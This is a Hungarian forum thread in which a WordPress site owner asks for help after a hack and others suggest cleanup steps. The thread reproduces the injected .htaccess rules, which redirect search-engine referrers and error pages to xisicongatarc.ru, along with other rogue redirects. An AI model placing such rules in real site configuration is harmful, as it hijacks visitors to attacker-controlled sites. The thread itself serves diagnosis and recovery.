xisicongatarc, backdoor és a .htaccess

egy pár php oldalamat megtámadta a xisicongatarc.ru, aminek eredményeként némelyik oldalam erre mutat: xisicongatarc.ru/emain/index.php











nagyon rossz ez így :z











már olvasom ezt: http://redleg-redleg…or-malware.html és ezt: http://redleg-redleg…4decode-in.html, de ezekhez én már kevés vagyok, mint maci sajtban a brum-brum.





itt is erről van szó: http://www.google.com/support/forum/p/Webmasters/thread?tid=7e42659c364e5501&hl=en











ha van egy jó megoldási ötleted, várom szeretettel. :slight_smile:

Üdv,











Eslősoron érdemes lenne belinkelni az oldalad, és talán megnézhetnénk a kimeneti html kódot.





Másodsoron érdemes lenne a tárhely szólgáltatóddal beszélni történt e root, dos támadás a szerver ellen amely a lapodat hostolja.





Harmadsoron érdemes lenne átnézni a szervereden levő fájlokat nem e módosult valamelyik. Gondolok itt .htaccess fájlra és a sablonod könyvtárában levő fájlokra.





Negyedsoron érdemes lenne a bővítményeket is átnézni, nem e valamelyik kártékony kódot tartalmaz.











Végül de nem utolsó sorban érdemes lenne feltelepíteni a WordPress antivírus bővítményt http://wordpress.org/extend/plugins/antivirus/

Ez nagyjából annyi ha átdob valahova, hogy a .htaccess fájlba benne van egy redirect és vissza is teszi, ha nem jó a jogosultság a fájlra, vagy mondjuk lehet nincs frissítve a WP?

Szia KardiWeb és Efrud,











http://the-passive-h…-magazine.info/ about, newsletter és a contact iPHM (jobb oldalt, az About dobozban) mutatnak a xisicongatarc.ru -ra.





6 php file-t átneveztem, ahogy az egyik red-leg cikkben olvastam, most huhu1.php - huhu6.php-ig számozódnak.





Valamikor rosszul telepítettem a Wordpress-t, így az egyik a másikban van. (http://the-passive-h…dpress/wp-admin) Így két .htaccess file-om is van.











Ez az egyik tartalma:















RewriteEngine On



RewriteCond %{HTTP_REFERER} ^.(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv).(.)



RewriteRule ^(.)$ http://xisicongatarc…emain/index.php [R=301,L]



RewriteCond %{HTTP_REFERER} ^.
(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.)



RewriteRule ^(.
)$ http://xisicongatarc…emain/index.php [R=301,L]











ErrorDocument 400 http://xisicongatarc…emain/index.php



ErrorDocument 401 http://xisicongatarc…emain/index.php



ErrorDocument 403 http://xisicongatarc…emain/index.php



ErrorDocument 404 http://xisicongatarc…emain/index.php



ErrorDocument 500 http://xisicongatarc…emain/index.php



És ez a másiké:











## BEGIN WordPress







RewriteEngine On



RewriteBase /



RewriteCond %{REQUEST_FILENAME} -f



RewriteCond %{REQUEST_FILENAME} -d



RewriteRule . /index.php [L]






END WordPress






RewriteRule ^rni01/(.*)$ http://medicalun.com/ [R,L]

RewriteRule ^ani01/(.*)$ http://martalois.com.../bar/index.html [R,L]




RewriteEngine On


RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv).(.*)


RewriteRule ^(.*)$ http://xisicongatarc...emain/index.php [R=301,L]


RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline).(.*)


RewriteRule ^(.*)$ http://xisicongatarc...emain/index.php [R=301,L]








ErrorDocument 400 http://xisicongatarc...emain/index.php


ErrorDocument 401 http://xisicongatarc...emain/index.php


ErrorDocument 403 http://xisicongatarc...emain/index.php


ErrorDocument 404 http://xisicongatarc...emain/index.php


ErrorDocument 500 http://xisicongatarc...emain/index.php



És ez a másiké:








## BEGIN WordPress



RewriteEngine On

RewriteBase /

RewriteCond %{REQUEST_FILENAME} -f

RewriteCond %{REQUEST_FILENAME} -d

RewriteRule . /index.php [L]



# END WordPress





RewriteRule ^rni01/(.*)$ http://medicalun.com/ [R,L]

RewriteRule ^ani01/(.*)$ http://martalois.com.../bar/index.html [R,L]

## BEGIN WordPress





RewriteEngine On


RewriteBase /


RewriteCond %{REQUEST_FILENAME} -f


RewriteCond %{REQUEST_FILENAME} -d


RewriteRule . /index.php [L]





# END WordPress








RewriteRule ^rni01/(.*)$ http://medicalun.com/ [R,L]


RewriteRule ^ani01/(.*)$ http://martalois.com.../bar/index.html [R,L]


A gyökérbe kell lennie egy ilyenek össz vissz:














BEGIN WordPress




RewriteEngine On

RewriteBase /

RewriteCond %{REQUEST_FILENAME} -f

RewriteCond %{REQUEST_FILENAME} -d

RewriteRule . /index.php [L]



# END WordPress





Többi mind "vírus".


## BEGIN WordPress





RewriteEngine On


RewriteBase /


RewriteCond %{REQUEST_FILENAME} -f


RewriteCond %{REQUEST_FILENAME} -d


RewriteRule . /index.php [L]





# END WordPress








Többi mind "vírus".

Most már akkora a gáz, hogy a főoldalon ugyan megjelenik a cikk, de ha a cikk címére kattintva vagy a Read the rest of this entry » -re, esetleg direct linkre kattint valaki, akkor is ez a fránya orosz oldal jön fel.


'Efrud' wrote:




A gyökérbe kell lennie egy ilyenek össz vissz:


...








Bár kicseréltem mindkét htaccessben, még nem lett jó, törlöm azt a 6 huhu-nak átnevezett php file-t is, hátha az meggyógyítja.





Köszönöm,





Tamás





Ezzel ellenőríztem az oldalam, és most én nem találok más hibás file-t: http://the-passive-h...find-string.php





DE még mindig a [font=helvetica, arial, sans-serif:3q9qdm7d]xisicongatarc.ru -ra mutat :([/font:3q9qdm7d]

wp-config.php-d tartalma?





pluginok?





sablon file-ok?





Hát, igaza van hgrg-nek. Elég sok helyen ott lehet már a dolog. Azokat feltétlen ellenőrizd amiket írt, meg szerintem tényleg írj a szolgáltatónak is.

“[font=helvetica, arial, sans-serif:2v4lxgv5]meg szerintem tényleg írj a szolgáltatónak is[/font:2v4lxgv5]”





+1 > persze hogy igen, de azt gondoltam ez volt a 0ik lépés és hányaveti-nemtörődöm-nem értek rá lényeg, hogy nem foglalkoztak vele -még- :slight_smile:


'hgrg' wrote:

wp-config.php-d tartalma? pluginok? sablon file-ok? ...





az egész oldalt a TC-el végig nézettem, nem találta már meg a xisicongatarc-t


így nem tudom, mit tehetek, már csak a Maxer-ben bízok

És mi van ha az url szét van dobva több darabba? :slight_smile: Még nem ejtettünk szót róla, hogy kicsit is rafináltak nem kötik az orrodra, hogy mit művelnek veled -> http://www.google.hu/search?sourceid=chrome&ie=UTF-8&q=obfuscate











Javaslat:




  1. Mindent ments le (adatbázist is természetesen)




  2. Törölj le mindent (adatbázist is természetesen)




  3. Új telepítés + tartalom migráció + minden 'visszarakott' tartalom pld pluginok újra beszerzése + sablon egy olyan verziójának felrakása amikor még tuti láthatáron sem voltak.





    előtte/közben: Azért hogy ez ne forduljon elő megkeresni az okot, hogyan jutottál idáig (pld ha valami plugin sz@rul van megírva vagy a sablonod ősrégi timthumb-ot használ … … /millió lehetőség/) majd megtenni a szükséges lépéseket ezen problémák kivédésére.

'TamasBanki' wrote:




az egész oldalt a TC-el végig nézettem, nem találta már meg a xisicongatarc-t


így nem tudom, mit tehetek, már csak a Maxer-ben bízok








Több, mint 20 oldalam fut a Maxer-nél, egyik sem szenvedett még ilyen támadást. A Maxer pedig azonnal ugrik a jelzésre, ennél sokkal kisebb gond esetén is. Kérd meg őket, hogy tegyenek fel a támadás észlelése előtti időpontban meglévő adatbázis és fájlmentést.





Én elgondolkodnék a saját gépről történő fertőzésen is, nem csak feltétlen a te oldaladról, hanem akiknek van hozzáférési joguk, arról az oldalról is.

Csak az én gépem fér hozzá. A Laptopom és a Asztalim.





Azokon hogy tudok rátalálni? Ugyanúgy TC-vel?


'hgrg' wrote:

És mi van ha az url szét van dobva több darabba?








Ajvéhból jelentik:


Tessék?????


Egy szó nem sok, de 2-t értek: BAJ VAN!


Csak a megoldást nem értem.


Most mindent letöltök/tölök, majd feltöltöm az eredeti template legújabb változatát és az összes plugint, ugye? És a végén az összes tartalmat. Jól gonolom?

http://the-passive-house-magazine.info/find-string.php most írtó sok helyen van az a fránya base64_decode

az nem jó :slight_smile:

Még mindig van itt ilyen:

















./wordpress/wp-app.php -> contains base64_decode





./wordpress/wp-includes/class-IXR.php -> contains base64_decode





./wordpress/wp-includes/class-simplepie.php -> contains base64_decode











http://the-passive-house-magazine.info/find-string.php











Ami azért fura, mert most töltöttem le innen: http://wphu.org/letoltes

azzal semmi gond nincsen. egy függvény megléte még nem jelent problémát. a gondot az jelenti amikor ennek segítségével megpróbálnak egy kódrészletet olvashatatlanná/értelmezhetetlenné tenni…

Nagyon sok WP-s oldalt ért támadás az utóbbi időben.





Nekem mindegyiken új WP van és így is!





Nagyon jó lenne egy komplett leírás, hogy miket kell változtatni.





(Better WP security, új 3.3.1, WP frissített téma,frissített pluginek .htaccess védelem, új ftp és admin krixkrax jelszó)





Újra feltörték!





Kezd a t@k@m tele lenni.





Ti hogyan látjátok?